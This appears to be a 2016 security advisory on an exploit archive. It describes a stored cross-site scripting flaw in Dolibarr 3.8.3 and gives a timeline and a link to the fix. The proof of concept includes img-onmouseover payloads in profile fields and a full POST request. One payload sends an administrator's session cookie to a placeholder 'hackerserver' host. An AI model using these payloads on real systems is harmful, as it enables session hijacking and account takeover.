what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Dolibarr 3.8.3 Cross Site Scripting

Dolibarr 3.8.3 Cross Site Scripting
Posted Jan 11, 2016
Authored by Mickael Dorigny | Site synetis.com

Dolibarr version 3.8.3 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | c17ecf80d34e2c761ee7e596af78927c7c4accbc17e3e897ce53a789bd3b1784

Dolibarr 3.8.3 Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: XSS on dolibarr 3.8.3
# Date: 03/01/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: http://www.dolibarr.org/
# Category: XSS
######################################################################

Dolibarr description :
======================================================================
Dolibarr ERP & CRM is a modern and easy to use web software to manage your business (contacts, invoices, orders, products, stocks, agenda, emailings, etc...).

It's opensource and free software designed for small companies, foundations and freelances.
You can install and use it as a standalone application, or online on a mutualized or dedicated server to use it from anywhere. Dolibarr is also available on ready to use Cloud services.

Vulnerability description :
======================================================================
A Stored XSS is available in the Dolibarr 3.8.3 core code. No module needs to be activated to exploit this XSS vulnerability because an attacker can use the user attributes management to do it.

This XSS can be exploited through a basic user account on the dolibarr installation. Impacted users are administrators and users that have right to check other user's attributes.

PoC n°1 : Stored XSS in user attributes:
====================================
Once a simple user is connected with his account, he can modifiy his attributes like Last name, First name, Mobile number, etc.. These informations can be reviewed by other users who have administration privileges.

Note that some basic protection are present just after form submitting. These protection doesn't allow attacker to use basic JavaScript tips like "<script>" tags or "onerror" JavaScript. But some other events or still allowed.

Using the <IMG> HTML tag and the "onmouseover" JavaScript event, we can force an admin to pass his mouse over the injected image. This event can be used to execute valid JavaScript instructions in the administrator browser or in browser of other users allowed to check user's attributes.

PoC :
As an authenticated user, fullfill "Last name", "First name", "email", "job" or "signature" input with this :
user1<img src=x onmouseover=alert(1)>

[REQUEST]
http://server/dolibarr/htdocs/user/card.php?id=2
[POSTDATA]
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="token"
3e01b40f4659396870a384c16213e400
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="action"
update
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="entity"
1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="lastname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="firstname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="job"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="gender"
man
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="login"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="password"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="admin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="superadmin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_phone"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="user_mobile"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_fax"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="email"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="signature"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="fk_user"
-1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="weeklyhours"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="save"
Save
-----------------------------7677991721297181448923571907--

Note that "First name" and "Last name" input are displayed in the "List of users" page, but they are truncated after 50 characters. This trunctation limits available XSS payloads. We can use the "signature" input to insert more JavaScript instructions in the same HTML form. Admin will then see this signature when they will click on a user in the "List of users" to see all his attributes.

Image insertion can target an existent or a non existent image. A little tips to have more chance to trap an admin is to upload a very big image (like 1920*1080) that will cover all the website page.

Once attributes are modified. Another user like an admin can check your attributes and then execute JavaScript instruction by passing his mouse over the injected image. Here is another Poc that will send the admin's cookie on a website controled by an attacker using a GET HTTP request. Inject this payload in the "signature" input :
<img src=x onmouseover=document.location="http://hackerserver?c="+document.cookie+"">

Using this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such as cookies.


Screenshots :
======================================================================
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-03.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-04.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-05.jpg

Solution:
======================================================================

The fix concerning this vulnerability is available on Dolibarr github repository : https://github.com/Dolibarr/dolibarr/issues/4341 / https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56

Additional resources :
======================================================================
- https://www.youtube.com/watch?v=p2rFWJOCJC8
- http://www.information-security.fr/en/xss-dolibarr-version-3-8-3/
- https://github.com/Dolibarr/dolibarr/issues/4341
- https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56


Report timeline :
======================================================================
2016-01-03 : Editor informed for vulnerability
2016-01-07 : Vulnerability is fixed
2016-01-11 : Advisory

Credits :
======================================================================

88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security

Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close